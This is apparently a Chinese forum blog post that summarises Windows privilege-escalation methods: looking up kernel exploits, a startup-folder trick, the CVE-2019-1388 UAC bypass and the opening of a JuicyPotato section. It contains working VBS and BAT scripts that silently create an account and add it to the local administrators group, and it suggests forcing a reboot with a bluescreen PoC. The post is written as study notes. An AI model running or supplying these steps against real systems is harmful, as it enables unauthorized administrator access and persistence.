前言

某段时间突然对权限提升感起了兴趣,在各大论坛和大佬们的博客寻找权限提升的姿势,固有了想对提权姿势进行一次系统整理的打算,本篇文章是对权限提升方法的总结,记录自己学习和复现的过程。

目录

[toc]

windows篇

windows溢出提权

具体步骤

  1. 查看系统补丁信息
    systeminfo
  2. 寻找可用exp
    https://github.com/SecWiki/windows-kernel-exploits
    https://bugs.hacking8.com/tiquan/
  3. 一把梭!

启动项提权

具体步骤

  • 启动项路径:
    C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • 在启动项中创建vbs或bat脚本
    vbs:
    set wshshell=createobject("wscript.shell")
    a=wshshell.run("cmd.exe /c net user 用户名 密码 /add",0)
    b=wshshell.run("cmd.exe /c net localgroup administrators 用户名 /add",0)
    bat:
    net user 用户名 密码 /add
    net localgroup administrators 用户名 /add
  • 接下来需要等待机器重启并以较大权限的账号登录,暴力一点可以配合漏洞打蓝屏poc强制重启。
  • bat脚本运行时会有个dos弹一下,vbs不会弹,建议使用vbs脚本

UAC提权(CVE-2019-1388)

漏洞简介

该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中。默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示——Secure Desktop。这些提示是由名为consent.exe的可执行文件产生的,该可执行文件以NT AUTHORITY\SYSTEM权限运行,完整性级别为System。因为用户可以与该UI交互,因此对UI来说紧限制是必须的。否则,低权限的用户可能可以通过UI操作的循环路由以SYSTEM权限执行操作。即使隔离状态的看似无害的UI特征都可能会成为引发任意控制的动作链的第一步。事实上,UAC会话中含有尽可能少的点击操作选项。
利用该漏洞很容易就可以提升权限到SYSTEM

影响范围

按照exp作者的描述,影响范围如下:
Windows 2008r2 7601 link OPENED AS SYSTEM
Windows 2012r2 9600 link OPENED AS SYSTEM
Windows 2016 14393 link OPENED AS SYSTEM
Windows 2019 17763 link NOT opened
Windows 7 SP1 7601 link OPENED AS SYSTEM
Windows 8 9200 link OPENED AS SYSTEM
Windows 8.1 9600 link OPENED AS SYSTEM
Windows 10 1511 10240 link OPENED AS SYSTEM
Windows 10 1607 14393 link OPENED AS SYSTEM
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
...

复现准备

  • EXP地址
    https://github.com/jas502n/CVE-2019-1388
  • 复现环境
    windows 7专业版
    ### 复现过程
  • 将EXP传入系统,点击下图中箭头所指的位置
  • 点击颁发者中的超链接
  • 成功弹出ie,此时ie是以system权限开启
  • 页面另存为,输入cmd路径
  • 权限为system

Juicypotato

工具简介

在尝试windows下的一系列提权操作后都没有成功,可以尝试一下烂土豆,这里在吐司上找到一个大佬改写的juicypotato,自动化程度比原版更高,使用起来更简单,配合webshell食用可以说是非常美味。

复现准备

  • 一个有执行权限的webshell
点击收藏 | 6 关注 | 2
登录 后跟帖